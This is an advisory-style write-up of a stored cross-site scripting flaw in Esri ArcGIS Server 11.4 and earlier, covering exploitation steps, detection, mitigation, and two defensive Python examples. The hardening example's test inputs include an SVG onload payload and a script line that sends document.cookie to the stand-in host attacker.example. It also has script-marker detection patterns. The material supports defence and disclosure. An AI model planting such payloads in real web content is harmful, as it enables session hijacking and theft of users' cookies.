Source: psirt@esri.com
There is a stored cross site scripting issue in Esri ArcGIS Server 11.4 and earlier on Windows and Linux that in some configurations allows a remote unauthenticated attacker to store files that contain malicious code that may execute in the context of a victim’s browser.
Esri ArcGIS Server 11.4 and earlier is vulnerable to stored cross-site scripting (XSS). In the affected configurations a remote, unauthenticated attacker can store a file containing script on the server; when another user's browser later loads that file from the ArcGIS Server origin, the script runs with that user's session, which can lead to session hijacking, actions performed as the victim, and exfiltration of data the victim is allowed to read.
Step 1: Payload creation. The attacker prepares a file that a browser will render as a document and that carries script: an HTML page, an SVG image with an event handler, or a JavaScript file. The script is written to run in the victim's browser, for example to read session data, redirect the user, or issue requests to the server as the victim.
Step 2: File upload. In some configurations (the advisory does not enumerate them) the upload path accepts files from unauthenticated clients. The attacker uses it to place the file where other users can retrieve it.
Step 3: Payload storage. ArcGIS Server keeps the file as received. Storing the bytes is not itself the flaw; the flaw is that nothing restricts the file's type or prevents it from later being served as renderable content from the application's own origin.
Step 4: Victim interaction. A legitimate user, typically one with more privileges than the attacker, opens a page, map, or report in ArcGIS Server that loads or links the stored file, or follows a direct link to it.
Step 5: Payload execution. The browser renders the file and runs the embedded script in the ArcGIS Server origin. The script can therefore read cookies not marked HttpOnly and any tokens held in web storage, and can send authenticated requests on the victim's behalf.
The root cause is that user-supplied files are accepted without type restriction and later returned to browsers in a way that lets them execute: there is no validation of what is uploaded, and no neutralization (a non-renderable content type, a download disposition, or a separate origin) when it is served. Because storage and rendering happen in the same origin, a single stored file yields arbitrary script execution for every user who views it.
Geospatial servers hold data of interest to actors focused on government and critical infrastructure, and the absence of an authentication requirement makes this exposure attractive. The advisory does not cite in-the-wild exploitation or a CISA KEV listing; prioritize remediation on the basis of the affected version range and the unauthenticated access path rather than on a claim of active exploitation.
Monitor server and web-tier logs for uploads of HTML, SVG, XML, or JavaScript files, for files whose content does not match their extension or declared type, and for uploads from clients that never authenticated.
Inspect requests to upload endpoints for script markers (<script, javascript:, on*= event handlers, <svg with handlers), decoding URL and HTML encoding before matching; request bodies are not in standard access logs, so this needs application-level or WAF logging.
Deploy a Web Application Firewall (WAF) with rules for stored XSS payloads on upload and for script in responses served from upload directories.
Use file-integrity monitoring on the directories ArcGIS Server serves as web content and on its upload locations, alerting on new or changed renderable files.
Correlate these events in a security information and event management (SIEM) system: an unauthenticated upload of renderable content followed by other users fetching the same path is the sequence to alert on.
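To make the first two detection items concrete, here is an added example that is not part of the advisory or of any Esri tooling: a small Python triage over constructed access-log lines in the common combined format. The /server/upload path is hypothetical and stands in for whatever upload endpoint a deployment exposes; the heuristics (renderable extension on a POST/PUT, script markers in the decoded URL, unauthenticated client, 2xx status) are the ones listed above. Request bodies are not in access logs, so body inspection would need application or WAF logs.

```python
import os
import re
from urllib.parse import unquote

# Constructed sample access-log lines in the Apache/Tomcat "combined" format.
# The /server/upload path is hypothetical, not a documented ArcGIS Server endpoint.
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Mar/2025:10:01:02 +0000] "POST /server/upload HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2025:10:02:13 +0000] "POST /server/upload/report.html HTTP/1.1" 201 2048 "-" "python-requests/2.31"
203.0.113.7 - - [12/Mar/2025:10:02:20 +0000] "PUT /server/upload/logo.svg HTTP/1.1" 201 900 "-" "curl/8.4.0"
198.51.100.9 - - [12/Mar/2025:10:03:44 +0000] "GET /server/upload/%3Cscript%3Ealert(1)%3C/script%3E.png HTTP/1.1" 404 0 "-" "curl/8.4.0"
10.0.0.8 - bob [12/Mar/2025:10:04:01 +0000] "POST /server/upload/parcels.zip HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# File types a browser renders as markup that can carry script.
ACTIVE_EXTENSIONS = {".html", ".htm", ".xhtml", ".svg", ".xml", ".js", ".shtml"}
# Script markers matched after URL-decoding; a heuristic, tune it to the deployment's noise.
SCRIPT_MARKERS = re.compile(r"<script|javascript:|\son[a-z]+\s*=", re.IGNORECASE)
UPLOAD_METHODS = {"POST", "PUT"}


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def triage_request(entry):
    """Reasons this request looks like a stored-XSS upload or probe; empty if benign."""
    decoded = unquote(entry["path"])
    ext = os.path.splitext(decoded.split("?", 1)[0])[1].lower()
    reasons = []
    if entry["method"] in UPLOAD_METHODS and ext in ACTIVE_EXTENSIONS:
        reasons.append("upload of renderable content (%s)" % ext)
    if SCRIPT_MARKERS.search(decoded):
        reasons.append("script markers in request URL")
    if reasons:
        # Context that raises priority: the advisory's exposure is unauthenticated,
        # and a 2xx means the server accepted (and likely stored) the request.
        if entry["user"] == "-":
            reasons.append("unauthenticated client")
        if entry["status"].startswith("2"):
            reasons.append("request accepted by server")
    return reasons


def triage(log_text):
    """Run triage_request over every line; return the suspicious ones with reasons."""
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = triage_request(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "method": entry["method"],
                             "path": entry["path"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["ip"], f["method"], f["path"], "->", "; ".join(f["reasons"]))
```

On the constructed sample this flags the two unauthenticated uploads of .html and .svg files that the server accepted, and the 404 probe carrying a script tag in its URL, while leaving the authenticated .zip upload and the bare POST alone. The bare POST is the important gap: a multipart upload shows no filename in the access log, so the same rules must also run against the application's own upload log or a WAF that sees the body.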
Upgrade ArcGIS Server to version 11.5 or later, which includes a fix for this vulnerability.
For any custom web application that accepts uploads into ArcGIS Server, validate file type on the server side (by content, not just extension) and encode output wherever user-supplied names or content are rendered.
Restrict accepted upload types and sizes to an allow-list of the formats the deployment actually needs.
Regularly scan the server for vulnerabilities and apply security patches promptly.
Implement a Web Application Firewall (WAF) to filter malicious requests.
Review and harden the server's configuration to minimize attack surface, in particular any setting that permits unauthenticated uploads.
Deploy a Content Security Policy that disallows inline script, and serve user-uploaded files so they cannot execute in the ArcGIS Server origin: force a download (Content-Disposition: attachment), set X-Content-Type-Options: nosniff, or host uploads on a separate origin.
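The five exploitation steps and the last mitigation above come down to the same thing: a stored file ends up rendered in the ArcGIS Server origin. The following Python example is added here and is not Esri code; it shows the response headers a generic web application would set for a stored upload in the vulnerable pattern beside the hardened one (nosniff, a sandboxing CSP, and a forced download for anything that could carry script). The function names and the constructed sample files are illustrative only.

```python
import os
import re
import mimetypes

# Extensions and MIME types a browser will render as markup that can carry
# script if they are served inline from the application's own origin.
ACTIVE_EXTENSIONS = {".html", ".htm", ".xhtml", ".svg", ".xml", ".js", ".mjs", ".shtml"}
ACTIVE_MIME_TYPES = {
    "text/html", "application/xhtml+xml", "image/svg+xml", "text/xml",
    "application/xml", "text/javascript", "application/javascript",
}
# Script markers checked in the body regardless of extension: a file named .txt
# or .png that starts with HTML may still be sniffed into a document.
SCRIPT_MARKERS = re.compile(rb"<script|<svg|javascript:|\son[a-z]+\s*=", re.IGNORECASE)


def is_active_content(filename, data):
    """True if the upload could execute script when rendered inline."""
    ext = os.path.splitext(filename.lower())[1]
    guessed = mimetypes.guess_type(filename)[0] or ""
    return (ext in ACTIVE_EXTENSIONS
            or guessed in ACTIVE_MIME_TYPES
            or SCRIPT_MARKERS.search(data[:4096]) is not None)


def vulnerable_headers(filename, data):
    """The pattern the advisory describes: trust the stored file's apparent type
    and let the browser render it inline, in the application's origin."""
    return {"Content-Type": mimetypes.guess_type(filename)[0] or "text/html"}


def hardened_headers(filename, data):
    """Serve stored uploads so they cannot run as script in this origin."""
    # Strip directories and anything that could break out of the header value.
    safe_name = re.sub(r"[^A-Za-z0-9._-]", "_", os.path.basename(filename))
    headers = {
        # Stop browsers from re-sniffing a benign declared type into HTML.
        "X-Content-Type-Options": "nosniff",
        # If the file is rendered at all, it gets an opaque origin and no script.
        "Content-Security-Policy": "sandbox; default-src 'none'",
    }
    if is_active_content(filename, data):
        # Never render stored active content inline: force a download under a
        # neutral type so the bytes cannot execute with the victim's session.
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = 'attachment; filename="%s"' % safe_name
    else:
        headers["Content-Type"] = mimetypes.guess_type(filename)[0] or "application/octet-stream"
        headers["Content-Disposition"] = 'inline; filename="%s"' % safe_name
    return headers


if __name__ == "__main__":
    # Constructed inputs: an SVG with an event handler, HTML disguised as a
    # text file (attacker.example is a reserved domain), and a genuine PNG header.
    samples = [
        ("logo.svg", b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>'),
        ("notes.txt", b"<script>location='https://attacker.example/?c='+document.cookie</script>"),
        ("photo.png", b"\x89PNG\r\n\x1a\n"),
    ]
    for name, body in samples:
        print(name, "vulnerable:", vulnerable_headers(name, body))
        print(name, "hardened:  ", hardened_headers(name, body))
```

The stronger variant of the same control is to serve uploads from a separate hostname that holds no session; the headers above are what to apply when the files must stay on the application's origin, and they compose with a site-wide CSP that forbids inline script.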